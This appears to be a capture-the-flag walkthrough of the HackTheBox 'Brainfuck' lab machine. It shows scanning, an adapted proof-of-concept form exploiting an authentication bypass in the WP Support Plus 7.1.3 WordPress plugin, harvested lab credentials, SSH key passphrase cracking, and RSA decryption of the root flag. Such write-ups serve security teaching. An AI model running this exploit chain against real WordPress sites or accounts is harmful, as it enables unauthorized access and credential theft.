Brainfuck

Initial Enumeration

Nmap

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.17 -sV                             
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 02:29 EDT
Nmap scan report for 10.10.10.17
Host is up (0.16s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
25/tcp  open  smtp     Postfix smtpd
110/tcp open  pop3     Dovecot pop3d
143/tcp open  imap     Dovecot imapd
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 25.16 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.17 -sV -sC -A -p22,25,110,143,443
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 02:33 EDT
Nmap scan report for 10.10.10.17
Host is up (0.16s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN) USER PIPELINING UIDL RESP-CODES CAPA AUTH-RESP-CODE
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: post-login more SASL-IR ENABLE Pre-login OK LOGIN-REFERRALS LITERAL+ listed capabilities AUTH=PLAINA0001 IMAP4rev1 IDLE have ID
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_http-title: Welcome to nginx!
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.10.0 (Ubuntu)
| tls-nextprotoneg: 
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 54.93 seconds

Running our Nmap scan, we can see multiple ports open. We will briefly look through each of them.

HTTPS

Based on our Nmap scan, the TLS certificate's Subject Alternative Name reveals two additional hostnames:

Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb

Navigating over to the website by IP, we just see a blank page with an expired certificate. We will add these hostnames to our /etc/hosts file so that name-based virtual hosts resolve to the target.

┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts                                  
[sudo] password for kali: 
                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts                                    
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.17 www.brainfuck.htb brainfuck.htb sup3rs3cr3t.brainfuck.htb

After adding these into the configuration file, we are able to access both of the webpages.

As soon as the page opens, we can identify a potential user from the “Dev Update” notification: “SMTP Integration is ready. Please check and send feedback to orestis@brainfuck.htb”.

Parameters:

Navigating further around the webpage, we note that each button leads to a numerical ID for the next page. For example, clicking the ‘Open Ticket’ tab in the navigation menu brings us to ?page_id=6. This holds for the entire website, so we can try different values to see whether any reveal interesting information.

p=1 shows the main page.

page_id=2 leads to another page, /wp-admin, which redirects us to /wp-login.

WordPress Vulnerability

┌──(kali㉿kali)-[~]
└─$ wpscan --url <https://brainfuck.htb> --disable-tls-checks 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - <https://automattic.com/>
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: <https://brainfuck.htb/> [10.10.10.17]
[+] Started: Sun Oct 20 03:45:10 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: <https://brainfuck.htb/xmlrpc.php>
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - <http://codex.wordpress.org/XML-RPC_Pingback_API>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
 |  - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>

[+] WordPress readme found: <https://brainfuck.htb/readme.html>
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: <https://brainfuck.htb/wp-cron.php>
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - <https://www.iplocation.net/defend-wordpress-from-ddos>
 |  - <https://github.com/wpscanteam/wpscan/issues/1299>

[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Rss Generator (Passive Detection)
 |  - <https://brainfuck.htb/?feed=rss2>, <generator><https://wordpress.org/?v=4.7.3></generator>
 |  - <https://brainfuck.htb/?feed=comments-rss2>, <generator><https://wordpress.org/?v=4.7.3></generator>

[+] WordPress theme in use: proficient
 | Location: <https://brainfuck.htb/wp-content/themes/proficient/>
 | Last Updated: 2024-10-16T00:00:00.000Z
 | Readme: <https://brainfuck.htb/wp-content/themes/proficient/readme.txt>
 | [!] The version is out of date, the latest version is 11.9
 | Style URL: <https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3>
 | Style Name: Proficient
 | Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
 | Author: Specia
 | Author URI: <https://speciatheme.com/>
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - <https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3>, Match: 'Version: 1.0.6'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
 | Location: <https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/>
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - <https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt>

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:05 <======================================================> (137 / 137) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>

[+] Finished: Sun Oct 20 03:45:26 2024
[+] Requests Done: 173
[+] Cached Requests: 5
[+] Data Sent: 43.166 KB
[+] Data Received: 203.026 KB
[+] Memory used: 266.449 MB
[+] Elapsed time: 00:00:15

Given the outdated WordPress version (4.7.3) and the outdated WP Support Plus Responsive Ticket System plugin (7.1.3), there is likely a public exploit. We will use searchsploit to check:

┌──(kali㉿kali)-[~]
└─$ searchsploit wordpress plugin wp support               
--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting                     | php/webapps/40190.txt
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities           | php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation             | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection                    | php/webapps/40939.txt
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~]
└─$ cat /usr/share/exploitdb/exploits/php/webapps/41006.txt

# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
# Software Link: <https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/>
# Exploit Author: Kacper Szurek
# Contact: <http://twitter.com/KacperSzurek>
# Website: <http://security.szurek.pl/>
# Category: web

1. Description

You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().

<http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html>

2. Proof of Concept

<form method="post" action="<http://wp/wp-admin/admin-ajax.php>">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

Then you can go to admin panel.

Running Exploit

We then write our own modified version of the provided PoC, pointing it at the target and using the admin username:

┌──(kali㉿kali)-[~]
└─$ cat wpadm.html                                         
<form method="post" action="<https://brainfuck.htb/wp-admin/admin-ajax.php>">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="orestic@brainfuck.htb">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

┌──(kali㉿kali)-[~]
└─$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (<http://0.0.0.0:8000/>) ...
127.0.0.1 - - [20/Oct/2024 03:58:26] "GET /wpadm.html HTTP/1.1" 200 -

After serving the page locally and submitting the form, the POST to https://brainfuck.htb/wp-admin/admin-ajax.php sets an authentication cookie for the admin user (the plugin calls wp_set_auth_cookie() without verifying the login); navigating to https://brainfuck.htb afterwards gives us admin access to the WordPress site.

Navigating over to the plugins page, we find an interesting plugin → Easy WP SMTP. Its settings page stores the mail account in clear text, which gives us the full credentials for the orestis user.

Username : orestis
E-Mail   : orestis@brainfuck.htb
From name: Orestis Makrogiannis
Password : kHGuERB29DNiNE

SMTP

With the credentials found, we log into the POP3 mailbox on port 110 (the same account the SMTP plugin uses) and read the stored mail.

┌──(kali㉿kali)-[~]
└─$ telnet -l orestis@brainfuck.htb 10.10.10.17 110
Trying 10.10.10.17...
Connected to 10.10.10.17.
Escape character is '^]'.
+OK Dovecot ready.
user orestis
+OK
pass kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
.
retr 1
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
        id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (<https://github.com/PHPMailer/PHPMailer>)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

<https://brainfuck.htb>

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: <https://brainfuck.htb/wp-login.php>

We hope you enjoy your new site. Thanks!

--The WordPress Team
<https://wordpress.org/>
.
retr 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
        id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
.

We will now log into the “secret” forum (sup3rs3cr3t.brainfuck.htb) with the newly found password and see whether it contains any interesting information.

Nice. Upon further inspection, we can see two threads → Key and SSH Access. Reading through the SSH Access thread, we learn that the administrator has permanently disabled password login, so a key is required to access the SSH service. Our user then opened an encrypted thread to get his key from the administrator.

Decryption

Son of a bitch:

    O orestis
    Apr '17

Mya qutf de buj otv rms dy srd vkdof :)

Pieagnm - Jkoijeg nbw zwx mle grwsnn

    A admin
    Apr '17

Xua zxcbje iai c leer nzgpg ii uy...

    O orestis
    Apr '17

Ufgoqcbje....

Wejmvse - Fbtkqal zqb rso rnl cwihsf

    A admin
    Apr '17

Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :)

mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja

    O orestis
    Apr '17

Si rbazmvm, Q'yq vtefc gfrkr nn ;)

Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

OK, to be fair, the URL kind of gave it away. The text looks like a shift cipher (a keyed one, i.e. Vigenère, since the key turns out to be a word), and we can assume that “.rfz” is really “.htb”. Using that known plaintext on an online cipher decoder (I used ChatGPT), we ultimately recover the key FUCKMYBRAIN. Below is the decrypted thread:

O orestis
    Apr '17
Hey give me the url for my key bitch :)

Orestis - Hacking for fun and profit

A admin
    Apr '17
Say please and i just might do so...

O orestis
    Apr '17
Pleeeease....

Orestis - Hacking for fun and profit

A admin
    Apr '17
There you go you stupid fuck, I hope you remember your key password because I dont :)

<https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa>

O orestis
    Apr '17
No problem, I'll brute force it ;)

Orestis - Hacking for fun and profit

From there, we are able to download the SSH private key (id_rsa) for our user orestis.
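The key recovery described above, as an added example that is not part of the original writeup: given the ciphertext URL from the thread and the guessed prefix "https://brainfuck.htb/" as known plaintext, it derives the key letter by letter, finds its period, and then decrypts the posts. The only assumptions are the cipher rules observed in the thread (key advances on letters only, case kept, each post restarts at the first key letter).

```python
import string

ALPHA = string.ascii_lowercase


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Undo the thread's Vigenère encryption.

    Observed rules: the key position advances only on letters, letter case
    is kept, every other character (spaces, ':', '/', digits) passes through
    unchanged, and every forum post starts again at the first key letter.
    """
    out = []
    pos = 0
    for ch in ciphertext:
        if ch.isalpha():
            shift = ALPHA.index(key[pos % len(key)].lower())
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            pos += 1
        else:
            out.append(ch)
    return "".join(out)


def key_stream(plaintext: str, ciphertext: str) -> str:
    """Per-letter key recovered from a known plaintext/ciphertext pair
    (key letter = ciphertext letter minus plaintext letter, mod 26)."""
    stream = []
    for p, c in zip(plaintext, ciphertext):
        if p.isalpha() != c.isalpha():
            raise ValueError("crib does not line up with the ciphertext")
        if p.isalpha():
            k = (ALPHA.index(c.lower()) - ALPHA.index(p.lower())) % 26
            stream.append(ALPHA[k].upper())
    return "".join(stream)


def shortest_period(stream: str) -> str:
    """Shortest repeating prefix of the key stream; only reliable when the
    crib contains more letters than the key is long."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - n] for i in range(n, len(stream))):
            return stream[:n]
    return stream


def recover_key(plaintext: str, ciphertext: str) -> str:
    return shortest_period(key_stream(plaintext, ciphertext))


# Ciphertext taken from the forum thread; the crib is the URL prefix the
# writeup guessed (".rfz" is ".htb", so the link starts "https://brainfuck.htb/").
ENC_URL = "mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja"
CRIB = "https://brainfuck.htb/"
ENC_POSTS = [
    "Mya qutf de buj otv rms dy srd vkdof :)",
    "Xua zxcbje iai c leer nzgpg ii uy...",
    "Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :)",
]

if __name__ == "__main__":
    key = recover_key(CRIB, ENC_URL)
    print("recovered key:", key)
    print(vigenere_decrypt(ENC_URL, key))
    for post in ENC_POSTS:
        print(vigenere_decrypt(post, key))
```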

Initial Foothold

The downloaded key is passphrase-protected, so we first crack the passphrase with john against the hash extracted from id_rsa, then use the key to SSH in as orestis.

┌──(kali㉿kali)-[~]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt   
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia!       (id_rsa)     
1g 0:00:00:04 DONE (2024-10-20 05:04) 0.2450g/s 3054Kp/s 3054Kc/s 3054KC/s 3prash0..3pornuthin
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                              
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa                                        
                                                                                              
┌──(kali㉿kali)-[~]
└─$ ssh orestis@10.10.10.17 -i id_rsa                       
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/advantage>

0 packages can be updated.
0 updates are security updates.

You have mail.
Last login: Mon Oct  3 19:41:38 2022 from 10.10.14.23
orestis@brainfuck:~$ cat user.txt
2c11cfbc5b959f73ac15a3310bd097c9

Root Flag

In orestis's home directory we find the encryption setup used for the root flag: a Sage script that RSA-encrypts /root/root.txt, together with its outputs. The primes p and q and the public exponent e were written to debug.txt, and the ciphertext to output.txt, so the private exponent can be recomputed directly.

orestis@brainfuck:~$ cat debug.txt 
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
orestis@brainfuck:~$ cat output.txt 
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
orestis@brainfuck:~$ cat encrypt.sage 
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)

c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

orestis@brainfuck:~$ nano decrypt.py
orestis@brainfuck:~$ cat decrypt.py 
import binascii, base64
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

def egcd(a, b):
    # extended Euclidean algorithm: returns (gcd, x, y) with a*x + b*y == gcd
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
    gcd = b
    return gcd, x, y

n = p*q #RSA modulus, product of the leaked primes
phi = (p-1)*(q-1) #Euler's totient of n
gcd, a, b = egcd(e, phi) #calling extended euclidean algorithm: a*e + b*phi == 1
d = a % phi #a is the decryption key; reduce mod phi in case egcd returned a negative coefficient
out = hex(d)
print("d_hex: " + str(out))
print("n_dec: " + str(d))
pt = pow(ct, d, n) #m = c^d mod n
print("pt_dec: " + str(pt))
out = hex(pt)
out = str(out[2:-1]) #Python 2: strip the leading "0x" and trailing "L" of the long
print "flag"
print out.decode("hex") #hex string back to the flag text (Python 2 str.decode)

orestis@brainfuck:~$ python decrypt.py
d_hex: 0xc6eccf2d2584044e2173cf0efa88f839ee184df56ce3e6aa450cfcdf9e5ec8b4d8123c2cd57ee4bf7c84e423941191ec57a7944e31327a722143edc1981ecf24bd9b389d673a1bd44288103e501f46994b700ac1abcb15339ff0750566957064605eb9205d159360fb6b907b39ee98683b0f6f418619fcb1665c4c7fa7984e9L
n_dec: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
pt_dec: 24604052029401386049980296953784287079059245867880966944246662849341507003750
flag
6efc1a5dbb8904751ce6566a305bb8ef
